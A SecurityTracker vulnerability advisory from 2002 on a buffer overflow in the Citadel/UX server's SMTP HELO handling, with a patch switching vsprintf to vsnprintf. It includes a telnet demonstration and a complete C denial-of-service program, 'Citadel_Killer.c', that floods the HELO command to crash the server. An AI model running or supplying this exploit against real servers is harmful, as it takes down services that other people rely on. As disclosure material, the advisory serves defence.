SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Citadel/UX Vendors:   [Multiple Authors/Vendors]
Citadel/UX Bulletin Board System SMTP Buffer Overflow Lets Remote Users Crash the Bulletin Board Service
SecurityTracker Alert ID:  1003801
SecurityTracker URL:  http://securitytracker.com/id/1003801
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 12 2002
Impact:   Denial of service via network
Fix Available:  Yes  Exploit Included:  Yes  

Description:   A buffer overflow vulnerability was reported in the Citadel/UX bulletin board system. A remote user can cause the bulletin board server to crash.

It is reported that a buffer overflow in the Citadel/UX server allows a remote user to cause the service to crash by sending a large amount of data to the server's SMTP port. The server reportedly fails to check the size of the input before copying the input to a statically defined buffer.

A demonstration exploit transcript is provided:

[xperc@security citadel]$telnet 192.168.0.3 25
Trying 192.168.0.3...
Connected to 192.168.0.3.
Escape character is '^]'.
220 security ESMTP Citadel/UX server ready.
helo [buffer]

[buffer] is around 4096 characters.

Impact:   A remote user can cause the bulletin board server to crash.
Solution:   No vendor solution was available at the time of this entry.

The author of the report has provided a patch, available in the Source Message and shown below:

Patch for this Vulnerability:
--- citadel-old/sysdep.c Sat Dec 8 12:31:44
2001
+++ citadel/sysdep.c Sat Mar 9 05:51:11
2002
@@ -106,7 +106,7 @@
char buf[4096];

va_start(arg_ptr, format);
- vsprintf(buf, format, arg_ptr);
+ vsnprintf(buf, sizeof(buf), format, arg_ptr);
va_end(arg_ptr);

if (loglevel <= verbosity) {

Vendor URL:  uncnsrd.mt-kisco.ny.us/citadel/index.html (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  Citadel/UX Server Remote DoS attack Vulnerability





What is Citadel/UX:

Citadel/UX is an advanced client/server BBS program 
for operating highly interactive sites, both on the 
Internet and over dialup. Users can connect to 
Citadel/UX using any of telnet, WWW, or client 
software. Among the features supported are public 
and private message bases (rooms), electronic mail, 
real-time chat, paging, etc. The server is 
multithreaded and can easily support a large number 
of concurrent users. In addition, SMTP and POP3 
servers are built-in for easy connection to Internet 
mail. Citadel/UX is both robust and mature, having 
been developed over the course of the past twelve 
years.

Problem:
I has found a buffer overflow in the Citadel/UX server. 
an attacker can execute a denial of service attack 
against it. Once the big buffer has been sent, the 
server is vulnerable.

Example:
[xperc@security citadel]$telnet 192.168.0.3 25
Trying 192.168.0.3...
Connected to 192.168.0.3.
Escape character is '^]'.
220 security ESMTP Citadel/UX server ready.
helo [buffer]


[buffer] is around 4096 characters. 


/* Citadel_Killer.c
 *
 * Remote Denial of Service Citadel/UX Server.  
 * 
 *		by xperc@hotmail.com
 */
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define MAXBUF 		8000 
#define MAXBUF2		MAXBUF+6
#define RECVBUF		256
#define CIT_SMTP	25	

int main(int argc, char *argv[])
{
	int sockfd;
	char msg[RECVBUF],buf[MAXBUF],sendbuf
[MAXBUF2];
	struct sockaddr_in target;

	if(argc!=2){
		fprintf(stderr,"Usage: %s 
target_address\n",*argv);
		exit(-1);
	}
	if((sockfd=socket
(AF_INET,SOCK_STREAM,0))<0){
		perror("socket");
		exit(-1);
	}
	target.sin_family=AF_INET;
	target.sin_port=htons(CIT_SMTP);
	target.sin_addr.s_addr=inet_addr(argv[1]);
	if(connect(sockfd,(struct sockaddr*)
&target,sizeof(target))<0){
		perror("connect");
		exit(-1);	
	}
	if(recv(sockfd,msg,sizeof(msg)-1,0)<=0){
		perror("recv");
		exit(-1);
	}

	memset(buf,'a',MAXBUF);
	snprintf(sendbuf,sizeof(sendbuf),"helo %
s",buf);
	strcat(sendbuf,"\n");

	send(sockfd,sendbuf,strlen(sendbuf),0);
	close(sockfd);

	return 0;
}

Patch for this Vulnerability:
--- citadel-old/sysdep.c	Sat Dec  8 12:31:44 
2001
+++ citadel/sysdep.c	Sat Mar  9 05:51:11 
2002
@@ -106,7 +106,7 @@
 	char buf[4096];
   
         va_start(arg_ptr, format);   
-        vsprintf(buf, format, arg_ptr);   
+        vsnprintf(buf, sizeof(buf), format, arg_ptr);   
         va_end(arg_ptr);   
 
 	if (loglevel <= verbosity) { 

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC